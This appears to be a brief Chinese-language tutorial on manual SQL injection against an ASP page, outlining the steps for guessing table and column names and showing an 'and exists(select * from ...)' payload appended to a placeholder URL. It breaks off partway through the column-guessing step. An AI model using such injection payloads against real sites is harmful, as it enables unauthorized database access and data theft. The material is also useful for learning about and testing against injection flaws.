SQL手工注入---表的猜解

手工注入过程 找到注入点→表名→列名→列长度→列值 注入点:http://www.xxx.com/index.asp?id=1 猜解表名 http://www.xxx.com/index.asp?id=1 and exists(select * from 猜测的表名) exists子查询的功能是判断子查询的返回结果中是否有数据行。 猜解列名 http://www.xxx.com/index.asp
相关文章
相关标签/搜索